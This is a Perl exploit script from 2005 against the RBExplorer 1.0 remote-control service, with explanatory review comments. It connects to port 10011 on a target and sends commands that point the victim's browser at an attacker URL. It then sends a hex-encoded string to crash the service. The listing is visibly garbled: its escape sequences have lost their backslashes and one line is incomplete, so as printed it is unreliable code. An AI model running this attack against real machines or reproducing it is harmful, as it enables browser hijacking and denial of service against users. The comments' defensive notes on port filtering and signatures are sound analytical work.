# Title : RBExplorer 1.0 (Hijacking Command) Denial of Service Exploit
# Published : 2005-10-11
# Author : basher13
#!usr/bin/perl
#
# RBExplorer Hijack Command Exploit
# ----------------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: http://www.kabrian.com /arbie@kabrian.com
#
use IO::Socket;
# Proof-of-concept client for the RBExplorer 1.0 issue named in the page title.
# It opens one TCP connection to port 10011 on the target, writes two text
# commands and then a final fixed string, and never reads anything back.
#
# NOTE(review): throughout this listing the string literals show "n" and "xNN"
# where Perl escapes would be expected. The backslashes appear to have been
# lost when the page was extracted, so as printed these are plain letters and
# digits rather than newlines and hex bytes. The code is left exactly as shown.

# Argument check: exactly three values are required (target host, an IP
# address, a URL). Any other count prints the usage text and exits.
if (@ARGV != 3)
{
print "n RBExplorer Hijack Command Exploitn";
print "-----------------------------------------nn";
print "[!] usage: perl $0 [target] [localIP] [LocalURL]n";
print "[?] exam: perl $0 192.332.34.4 213.234.12.1 http://hijack.spyp0rn.comn";
print "n";
exit ();
}
# None of the three arguments is validated; $lip and $lurl are interpolated
# directly into the lines written to the socket further down.
# These are package globals (no "my", and the file has no strict/warnings).
$adr = $ARGV[0];
$lip = $ARGV[1];
$lurl = $ARGV[2];
# Final payload. Read as hex escapes, the bytes spell the ASCII keyword
# "#Download" followed by 54 uppercase filler letters (63 bytes in total).
# The page does not explain why this input stops the service; the title only
# classes the result as a denial of service.
$crash =
"x23x44x6fx77x6ex6cx6fx61x64".
"x57x48x4fx41x52x45x59x4fx55x49".
"x53x4ex4fx54x49x4dx50x4fx52x54".
"x41x4ex54x42x55x54x54x48x45x52".
"x45x4fx4ex45x57x41x59x54x4fx46".
"x49x4cx4cx46x52x45x45x49x42x45".
"x4cx49x56x45";
print "n[+] Connect to $adr..n";
# Single outbound connection to the target on port 10011. The Proto value is
# "tcp" when read as hex escapes. The script dies here if the connect fails.
# Defender's view: everything below rides on this one connection and nothing
# resembling credentials or a handshake is sent first, so reachability of
# port 10011 from untrusted hosts is the precondition this script relies on.
# Filtering that port to trusted peers removes the path used here.
$remote = IO::Socket::INET->new(Proto=>"x74x63x70", PeerAddr=>$adr,
PeerPort=>10011, Reuse=>1) or die "Error: can't connect to $adr:10011n";
# Command keywords, hex-encoded in the source: $chr1 reads as "$IP:" and
# $chr2 as "#NavigateTo". Together with "#Download" above, these plaintext
# strings on port 10011 are the content a network signature could match on.
$chr1 = "x24x49x50x3a";
$chr2 = "x23x4ex61x76x69x67x61x74x65x54x6f";
print "[+] Connectedn";
# Flush after every write so each command leaves immediately.
$remote->autoflush(1);
print $remote "n";
sleep(1);
# First command: the "$IP:" keyword followed by the caller-supplied address.
# NOTE(review): "and ... or die" only reacts to a failed print. The script
# never reads from the socket, so the "not listen" error and the
# "listening!" message below do not reflect any response from the target.
print $remote "$chr1 $lipn" and print "[+] Hijacking $adr...n" or die
"[-] Error: $lip not listenn";
sleep(2);
print "[+] $lip listening!n";
# Second command: the "#NavigateTo" keyword followed by the caller-supplied
# URL. As above, the only failure detected is a local write error.
print $remote "$chr2 $lurln" and print "[+] Hijacking browser...n" or die
"[-] Error: hijacking failedn";
sleep(2);
# Printed unconditionally after the delay; it is not evidence that the remote
# side acted on the command.
print "[+] Browser hijacked!n";
print "[+] Sleep 15 seconds..n";
sleep(15);
print "[+] Send crash byte..n";
# Writes the fixed payload built above, with no trailing line terminator.
print $remote "$crash";
sleep(2);
# Also unconditional: the script does not check whether the service stopped.
print "[+] DONEnn";
print "..press any key to exitn";
# NOTE(review): the right-hand side is missing in this listing (presumably a
# read from standard input, given the prompt above, lost in extraction), so
# the file does not parse as shown.
$bla= ;
close $remote;